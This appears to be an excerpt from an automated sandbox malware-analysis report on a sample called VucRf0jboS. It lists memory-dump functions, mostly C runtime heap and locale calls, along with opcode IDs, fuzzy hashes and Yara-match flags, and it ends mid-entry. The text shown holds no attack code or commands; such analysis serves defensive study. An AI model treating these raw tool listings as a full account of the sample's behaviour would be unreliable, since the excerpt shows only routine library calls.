                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$Info
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2509303402-0
                                                                                                                                                                                                                                      • Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                                                                                                      • Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$Info
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2509303402-0
                                                                                                                                                                                                                                      • Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                                                                                                      • Instruction ID: f6731af5d4f6484c6480adb64b458d2d006507db6fc4216c50924c1d84cb4f09
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79B19071900205DFEB21DFB9C8C0BEEB7F5BF08304F5440ADE9A9A7261DB75A8418B61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0041F565
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
                                                                                                                                                                                                                                        • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F55A
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F57C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F591
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F59C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F5BE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F5D1
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F5DF
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F5EA
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F622
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F629
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F646
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F65E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                      • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                                      • Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0415F7CC
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB38
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB4A
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB5C
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB6E
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB80
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB92
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBA4
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBB6
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBC8
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBDA
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBEC
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBFE
                                                                                                                                                                                                                                        • Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EC10
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F7C1
                                                                                                                                                                                                                                        • Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
                                                                                                                                                                                                                                        • Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F7E3
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F7F8
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F803
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F825
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F838
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F846
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F851
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F889
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F890
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F8AD
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F8C5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                      • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                                      • Instruction ID: 948751188e9e5655c4e6b0d2d7a130a7e7c69956286fb93f8a52b04914159105
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31313B32690305DFEB30AA78D8C4BDA77E9EF00364F5444A9E879D6170DF32F9428A51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
                                                                                                                                                                                                                                      • Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                                                                                      • String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                      • API String ID: 3527080286-1021189420
                                                                                                                                                                                                                                      • Opcode ID: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
                                                                                                                                                                                                                                      • Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                                      • Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156EA0
                                                                                                                                                                                                                                        • Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
                                                                                                                                                                                                                                        • Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156EAC
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156EB7
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156EC2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156ECD
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156ED8
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156EE3
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156EEE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156EF9
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04156F07
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                                      • Instruction ID: 1ee6b961fe7425f7538cbeeb8e3061bf0475b2c88a243533e794e145697c6505
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9811A476160108EFEB11EF95C880CDD3BA5EF143A8B8144A5FE1C8B235DB32FA509B81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                        • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                        • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                                                                                      • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                      • Opcode ID: c10292f7589eabcfa51c9483d5f78d48ea4549d6174e0272d87768e1f32795f7
                                                                                                                                                                                                                                      • Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c10292f7589eabcfa51c9483d5f78d48ea4549d6174e0272d87768e1f32795f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0414141C
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0414142E
                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0414146B
                                                                                                                                                                                                                                        • Part of subcall function 041480E1: _Yarn.LIBCPMT ref: 04148100
                                                                                                                                                                                                                                        • Part of subcall function 041480E1: _Yarn.LIBCPMT ref: 04148124
                                                                                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0414148C
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0414149A
                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 041414BD
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0414152E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                      • String ID: n~B
                                                                                                                                                                                                                                      • API String ID: 835844855-2489732092
                                                                                                                                                                                                                                      • Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                                                                                                      • Instruction ID: 26c84501a5a9e8cc25370679a1d17e5f5c07dd8ace38517aedbdc6ef49c763b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81316F71804B40EFD731AF69D88065AFFF4FF88714B108A6FE09A92A50C774BA41CB55
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                                                                                                      • Instruction ID: 21eaa6420f9cc1fcfedeb97e5cb79ab2a309c22baf1b9bf3c4ccee9a6051f6b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBC1B1B5A14249EFEB119FA8C8C0BEDBBB4AF09314F0840D5D965A73B1C734A941CF66
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                      • String ID: C
                                                                                                                                                                                                                                      • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                      • Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                                                                                                      • Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 04154F5B
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04154FCC
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04154FE5
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04155017
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04155020
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415502C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                      • String ID: C
                                                                                                                                                                                                                                      • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                      • Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                                                                                                      • Instruction ID: 3c3cb6d4f9c764ab0347d34b9772c9c2e3cc351fae2f0bbb29b273fe70d9cd9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82B12575A01219DBDB24DF18C884BEDB7B4FB48314F5045EAD959A7264E731BE90CF80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                      • String ID: B$|B
                                                                                                                                                                                                                                      • API String ID: 3033488037-200315465
                                                                                                                                                                                                                                      • Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
